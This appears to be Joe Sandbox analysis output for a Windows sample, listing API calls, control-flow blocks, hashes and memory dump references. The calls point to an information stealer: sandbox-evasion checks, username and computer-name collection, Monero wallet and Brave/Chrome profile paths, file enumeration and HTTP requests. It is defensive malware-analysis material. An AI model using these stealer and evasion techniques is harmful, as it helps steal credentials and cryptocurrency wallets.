                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EF757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF760A
                      • wsprintfA.USER32 ref: 00EF7640
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\
                      • API String ID: 1544550907-3809124531
                      • Opcode ID: 3870139a8c399906491284c1241a761359650c1d74b8acb97b45789edc70fddb
                      • Instruction ID: 98dd6c7d2870e8b9388366529b0ba9ec0da40b1aa2342be02531f9b1a8ccea72
                      • Opcode Fuzzy Hash: 3870139a8c399906491284c1241a761359650c1d74b8acb97b45789edc70fddb
                      • Instruction Fuzzy Hash: 2A41A5B1D0424CABDF24DF94DC45BEEBBB8AF48704F104099F609B7284D7756A84CBA5

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016807C8), ref: 00EF98A1
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680798), ref: 00EF98BA
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680678), ref: 00EF98D2
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680690), ref: 00EF98EA
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680600), ref: 00EF9903
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01688A58), ref: 00EF991B
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01676960), ref: 00EF9933
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016765C0), ref: 00EF994C
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016807B0), ref: 00EF9964
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680528), ref: 00EF997C
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680558), ref: 00EF9995
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680630), ref: 00EF99AD
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016765E0), ref: 00EF99C5
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016805E8), ref: 00EF99DE
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EE11D0: ExitProcess.KERNEL32 ref: 00EE1211
                        • Part of subcall function 00EE1160: GetSystemInfo.KERNEL32(?), ref: 00EE116A
                        • Part of subcall function 00EE1160: ExitProcess.KERNEL32 ref: 00EE117E
                        • Part of subcall function 00EE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EE112B
                        • Part of subcall function 00EE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EE1132
                        • Part of subcall function 00EE1110: ExitProcess.KERNEL32 ref: 00EE1143
                        • Part of subcall function 00EE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EE123E
                        • Part of subcall function 00EE1220: __aulldiv.LIBCMT ref: 00EE1258
                        • Part of subcall function 00EE1220: __aulldiv.LIBCMT ref: 00EE1266
                        • Part of subcall function 00EE1220: ExitProcess.KERNEL32 ref: 00EE1294
                        • Part of subcall function 00EF6770: GetUserDefaultLangID.KERNEL32 ref: 00EF6774
                        • Part of subcall function 00EE1190: ExitProcess.KERNEL32 ref: 00EE11C6
                        • Part of subcall function 00EF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE11B7), ref: 00EF7880
                        • Part of subcall function 00EF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7887
                        • Part of subcall function 00EF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF789F
                        • Part of subcall function 00EF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7910
                        • Part of subcall function 00EF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7917
                        • Part of subcall function 00EF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF792F
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00EF6AF9
                      • Sleep.KERNEL32(00001770), ref: 00EF6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6B1A
                      • ExitProcess.KERNEL32 ref: 00EF6B22
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 03bf8e213969874a30a1b1bfc1789abab2bf08fca86f632a40798bfd1e25ee5a
                      • Instruction ID: c1edf7afedb3f410b760fc44f7d3eec4de0b1005188999f0787611ecf61fe5f8
                      • Opcode Fuzzy Hash: 03bf8e213969874a30a1b1bfc1789abab2bf08fca86f632a40798bfd1e25ee5a
                      • Instruction Fuzzy Hash: 7731FE7190010CABDB18FBA0E856BFE77B8AF44380F146538F316BA185DFB05A45C7A6

                      Control-flow Graph

                      • Graph of the function whose first basic block is ee1220-ee1247; node and edge rendering not reproduced, the API calls it makes are listed under APIs below
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EE123E
                      • __aulldiv.LIBCMT ref: 00EE1258
                      • __aulldiv.LIBCMT ref: 00EE1266
                      • ExitProcess.KERNEL32 ref: 00EE1294
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: b82b7a7a1537be8e8d175f871f38dde70bbb878c91a2d1ec2c04c92c51714e3e
                      • Instruction ID: 316212524ddbcbcde9c71bd2636e11b1efc5f93abe3fa03709db6b67c6becaa1
                      • Opcode Fuzzy Hash: b82b7a7a1537be8e8d175f871f38dde70bbb878c91a2d1ec2c04c92c51714e3e
                      • Instruction Fuzzy Hash: 35018FB094434CBADF10DBD0CC49BADBBB8AB04705F208044E705B6180D67455809758

                      Control-flow Graph (basic blocks and edges)
                      • ef6af3 -> ef6b0a
                      • ef6b0a -> ef6b0c-ef6b22 or ef6aba-ef6ad7
                      • ef6aba-ef6ad7: call efaad0, OpenEventA -> ef6ad9-ef6af1 or ef6af5-ef6b04
                      • ef6ad9-ef6af1: call efaad0, CreateEventA -> ef6b0c-ef6b22
                      • ef6af5-ef6b04: CloseHandle, Sleep -> ef6b0a
                      • ef6b0c-ef6b22: call ef6920, call ef5b10, CloseHandle, ExitProcess
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00EF6AF9
                      • Sleep.KERNEL32(00001770), ref: 00EF6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6B1A
                      • ExitProcess.KERNEL32 ref: 00EF6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 8b2f61df810dfc045d0e74668b9466c6205055969d374fb39aefd668b5200a49
                      • Instruction ID: e8bbb8be2741014d91c53b143306210d14da6db4750cf8ac2d2e03e7ca8cd54f
                      • Opcode Fuzzy Hash: 8b2f61df810dfc045d0e74668b9466c6205055969d374fb39aefd668b5200a49
                      • Instruction Fuzzy Hash: 51F03A7094060DBBEB30AFA0AC0ABBD7B74EF54701F106524F713B6581CBB05580D655

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: ad53b70ae0f8740461c8abd1be90ee5ad34e871f03433f461af16a2cadc0116c
                      • Instruction ID: fd469ff52d537478b7cdb1dd86362e785c0f5d4ee927a3514a23dbb949d98134
                      • Opcode Fuzzy Hash: ad53b70ae0f8740461c8abd1be90ee5ad34e871f03433f461af16a2cadc0116c
                      • Instruction Fuzzy Hash: 232100B1D01209ABDF14DFA5E845ADE7778FF45310F109625F525BB280DB706609CB91

                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE6280: InternetOpenA.WININET(00F00DFE,00000001,00000000,00000000,00000000), ref: 00EE62E1
                        • Part of subcall function 00EE6280: StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6303
                        • Part of subcall function 00EE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE6335
                        • Part of subcall function 00EE6280: HttpOpenRequestA.WININET(00000000,GET,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE6385
                        • Part of subcall function 00EE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EE63BF
                        • Part of subcall function 00EE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE63D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 43db05c2fa6cdbbf861f69a3fda4840af78d60ee316789f152415d036ac2813c
                      • Instruction ID: 413811d2f9ad1f195c93981ff491b3e70c1115478e78951135e35cbfa4a28927
                      • Opcode Fuzzy Hash: 43db05c2fa6cdbbf861f69a3fda4840af78d60ee316789f152415d036ac2813c
                      • Instruction Fuzzy Hash: 05114F7180054CA6DB18FF60DC52AFC33B8AF50340F449168FA0E6A1A2EF70AB09C691
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EE112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EE1132
                      • ExitProcess.KERNEL32 ref: 00EE1143
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 05f22e5cf6cc8229baf70f6e791edeaa3ba87bbc5a67e31870a62703207aed83
                      • Instruction ID: 90dd0a9e5c461cbb45debff47b44a4dfd039fb3ce5c1336501cf25d4bec317fe
                      • Opcode Fuzzy Hash: 05f22e5cf6cc8229baf70f6e791edeaa3ba87bbc5a67e31870a62703207aed83
                      • Instruction Fuzzy Hash: 9BE0E67094534CFBE7346FA1AC0AB0D76B8AF04B06F105094F709B75C4D6F526909799
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EE10B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EE10F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 1eab06e7b0de29b5debbc66b8f9693402df43a272ccb6b2eb17305129c7053cc
                      • Instruction ID: 9b7c1809cd91cf4b2af5cd1120b8a9fc1f9546f6c5952229d8cc612fd11a4ecc
                      • Opcode Fuzzy Hash: 1eab06e7b0de29b5debbc66b8f9693402df43a272ccb6b2eb17305129c7053cc
                      • Instruction Fuzzy Hash: 15F0E271641248BBEB249AA4AC49FBBB7E8E709B15F301458F604E3280D5729E80CBA4
                      APIs
                        • Part of subcall function 00EF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7910
                        • Part of subcall function 00EF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7917
                        • Part of subcall function 00EF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF792F
                        • Part of subcall function 00EF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE11B7), ref: 00EF7880
                        • Part of subcall function 00EF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7887
                        • Part of subcall function 00EF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF789F
                      • ExitProcess.KERNEL32 ref: 00EE11C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 03f54a59d7b9b9b96a8b20b6e283e843348482d52f2c750a3f94fb9a86e466fb
                      • Instruction ID: 15b76706dbf3fcad6f1a98c415a33c82df87599e429c9776fa923c1d3a7525f0
                      • Opcode Fuzzy Hash: 03f54a59d7b9b9b96a8b20b6e283e843348482d52f2c750a3f94fb9a86e466fb
                      • Instruction Fuzzy Hash: 7EE0E675A1425963CA2876B17D06B3632DC9F14389F041464F705E3502FA35E4608665
                      APIs
                      • wsprintfA.USER32 ref: 00EF38CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF38E3
                      • lstrcat.KERNEL32(?,?), ref: 00EF3935
                      • StrCmpCA.SHLWAPI(?,00F00F70), ref: 00EF3947
                      • StrCmpCA.SHLWAPI(?,00F00F74), ref: 00EF395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF3C67
                      • FindClose.KERNEL32(000000FF), ref: 00EF3C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: cc42c2c81c8c174c4b8e6992f40fa041eef0cea471955c532d3b62e9c4fc9f91
                      • Instruction ID: b49d9cb88e8b1f871a536d05c7d65511fdf0944c6c12d56c778462fba8a49610
                      • Opcode Fuzzy Hash: cc42c2c81c8c174c4b8e6992f40fa041eef0cea471955c532d3b62e9c4fc9f91
                      • Instruction Fuzzy Hash: 75A12FB190020CABDB34DF64DC85FFA73B8AF88301F444598E61DA6145EB759B94CF62
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00F00B32,00F00B2B,00000000,?,?,?,00F013F4,00F00B2A), ref: 00EEBEF5
                      • StrCmpCA.SHLWAPI(?,00F013F8), ref: 00EEBF4D
                      • StrCmpCA.SHLWAPI(?,00F013FC), ref: 00EEBF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEC7BF
                      • FindClose.KERNEL32(000000FF), ref: 00EEC7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
